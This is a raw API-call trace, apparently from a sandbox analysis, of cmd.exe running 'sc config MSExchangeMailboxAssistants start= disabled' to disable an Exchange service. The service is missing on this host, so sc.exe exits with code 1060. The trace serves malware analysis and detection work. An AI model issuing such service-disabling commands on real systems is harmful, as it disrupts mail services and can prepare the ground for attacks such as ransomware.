hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4ace7c0 | out: phkResult=0x4ace7c0*=0x94) returned 0x0 [0131.178] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x0, lpData=0x4ace7cc*=0x8, lpcbData=0x4ace7c8*=0x1000) returned 0x2 [0131.178] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x1, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.178] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x0, lpData=0x4ace7cc*=0x1, lpcbData=0x4ace7c8*=0x1000) returned 0x2 [0131.178] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x0, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x40, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x40, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x0, lpData=0x4ace7cc*=0x40, lpcbData=0x4ace7c8*=0x1000) returned 0x2 [0131.179] RegCloseKey (hKey=0x94) returned 0x0 [0131.179] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4ace7c0 | out: phkResult=0x4ace7c0*=0x94) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x0, lpData=0x4ace7cc*=0x40, lpcbData=0x4ace7c8*=0x1000) returned 0x2 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x1, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x0, lpData=0x4ace7cc*=0x1, lpcbData=0x4ace7c8*=0x1000) returned 0x2 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x0, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x9, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x4, lpData=0x4ace7cc*=0x9, lpcbData=0x4ace7c8*=0x4) returned 0x0 [0131.179] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ace7c4, lpData=0x4ace7cc, lpcbData=0x4ace7c8*=0x1000 | out: lpType=0x4ace7c4*=0x0, lpData=0x4ace7cc*=0x9, lpcbData=0x4ace7c8*=0x1000) returned 0x2 [0131.179] RegCloseKey (hKey=0x94) returned 0x0 [0131.179] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29834 [0131.179] srand (_Seed=0x5ad29834) [0131.179] GetCommandLineW () returned="/c sc config MSExchangeMailboxAssistants start= disabled" [0131.179] GetCommandLineW () returned="/c sc config MSExchangeMailboxAssistants start= disabled" [0131.179] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e99d18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0131.179] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0131.179] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.179] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.179] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.179] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.179] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.179] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.179] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.179] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.179] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.179] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.180] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.180] GetEnvironmentStringsW () returned 0x4e97dc0* [0131.180] FreeEnvironmentStringsA (penv="A") returned 1 [0131.180] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.180] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.180] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.180] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.180] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.180] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.180] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.180] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.180] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.180] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acf598 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.180] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4acf598, lpFilePart=0x4acf590 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4acf590*="Desktop") returned 0x1d [0131.180] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0131.180] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4acf318 | out: lpFindFileData=0x4acf318) returned 0x4e905c8 [0131.180] FindClose (in: hFindFile=0x4e905c8 | out: hFindFile=0x4e905c8) returned 1 [0131.180] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4acf318 | out: lpFindFileData=0x4acf318) returned 0x4e905c8 [0131.181] FindClose (in: hFindFile=0x4e905c8 | out: hFindFile=0x4e905c8) returned 1 [0131.181] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0131.181] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4acf318 | out: lpFindFileData=0x4acf318) returned 0x4e905c8 [0131.181] FindClose (in: hFindFile=0x4e905c8 | out: hFindFile=0x4e905c8) returned 1 [0131.181] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0131.181] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0131.181] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0131.181] GetEnvironmentStringsW () returned 0x4e97dc0* [0131.181] FreeEnvironmentStringsA (penv="=") returned 1 [0131.181] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.181] GetConsoleOutputCP () returned 0x1b5 [0131.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.182] GetUserDefaultLCID () returned 0x409 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4acf6c8, cchData=128 | out: lpLCData="0") returned 2 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4acf6c8, cchData=128 | out: lpLCData="0") returned 2 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4acf6c8, cchData=128 | out: lpLCData="1") returned 2 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0131.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0131.182] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.183] GetConsoleTitleW (in: lpConsoleTitle=0x4e9aa78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.183] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.183] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0131.183] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0131.183] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0131.184] _wcsicmp (_String1="sc", _String2=")") returned 74 [0131.184] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0131.184] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0131.184] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0131.184] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0131.184] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0131.184] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0131.185] GetConsoleTitleW (in: lpConsoleTitle=0x4acf3b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.185] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0131.185] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0131.185] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0131.185] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0131.185] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0131.185] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0131.185] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0131.185] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0131.185] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0131.185] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0131.185] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0131.185] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0131.185] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0131.185] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0131.185] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0131.185] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0131.185] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0131.185] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0131.185] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0131.185] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0131.185] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0131.185] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0131.185] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0131.186] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0131.186] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0131.186] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0131.186] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0131.186] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0131.186] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0131.186] _wcsicmp (_String1="sc", _String2="START") returned -17 [0131.186] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0131.186] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0131.186] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0131.186] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0131.186] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0131.186] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0131.186] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0131.186] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0131.186] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0131.186] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0131.186] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0131.186] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0131.186] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0131.186] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0131.186] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0131.186] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0131.186] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0131.186] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0131.186] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0131.186] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0131.186] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0131.186] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0131.186] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0131.186] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0131.186] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0131.186] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0131.186] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0131.186] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0131.186] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0131.186] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0131.186] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0131.186] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0131.186] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0131.186] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0131.186] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0131.186] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0131.186] _wcsicmp (_String1="sc", _String2="START") returned -17 [0131.186] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0131.186] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0131.186] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0131.186] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0131.187] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0131.187] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0131.187] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0131.187] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0131.187] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0131.187] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0131.187] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0131.187] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0131.187] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0131.187] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0131.187] SetErrorMode (uMode=0x0) returned 0x0 [0131.187] SetErrorMode (uMode=0x1) returned 0x0 [0131.187] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e98dd0, lpFilePart=0x4aceebc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4aceebc*="Desktop") returned 0x1d [0131.187] SetErrorMode (uMode=0x0) returned 0x1 [0131.187] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0131.187] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.195] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.195] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.195] GetConsoleTitleW (in: lpConsoleTitle=0x4acf13c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.195] InitializeProcThreadAttributeList (in: lpAttributeList=0x4acf068, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4acf04c | out: lpAttributeList=0x4acf068, lpSize=0x4acf04c) returned 1 [0131.195] UpdateProcThreadAttribute (in: lpAttributeList=0x4acf068, dwFlags=0x0, Attribute=0x60001, lpValue=0x4acf054, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4acf068, lpPreviousValue=0x0) returned 1 [0131.195] GetStartupInfoW (in: lpStartupInfo=0x4acf0a0 | out: lpStartupInfo=0x4acf0a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.195] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.196] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.196] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.197] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeMailboxAssistants start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4aceff0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeMailboxAssistants start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4acf03c | out: lpCommandLine="sc config MSExchangeMailboxAssistants start= disabled", lpProcessInformation=0x4acf03c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf90, dwThreadId=0xfec)) returned 1 [0131.204] CloseHandle (hObject=0xa4) returned 1 [0131.204] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.204] GetEnvironmentStringsW () returned 0x4e99f28* [0131.204] FreeEnvironmentStringsA (penv="=") returned 1 [0131.204] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0131.257] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4acefd4 | out: lpExitCode=0x4acefd4*=0x424) returned 1 [0131.257] CloseHandle (hObject=0xa8) returned 1 [0131.257] _vsnwprintf (in: _Buffer=0x4acf0bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x4acefdc | out: _Buffer="00000424") returned 8 [0131.258] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0131.258] GetEnvironmentStringsW () returned 0x4e9b368* [0131.258] FreeEnvironmentStringsA (penv="=") returned 1 [0131.258] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.258] GetEnvironmentStringsW () returned 0x4e9b368* [0131.258] FreeEnvironmentStringsA (penv="=") returned 1 [0131.258] DeleteProcThreadAttributeList (in: lpAttributeList=0x4acf068 | out: lpAttributeList=0x4acf068) [0131.258] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.258] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.258] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.258] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.258] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.258] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.258] SetConsoleInputExeNameW () returned 0x1 [0131.258] GetConsoleOutputCP () returned 0x1b5 [0131.259] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.259] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.259] exit (_Code=1060) Thread: id = 485 os_tid = 0xf98 Process: id = "141" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root 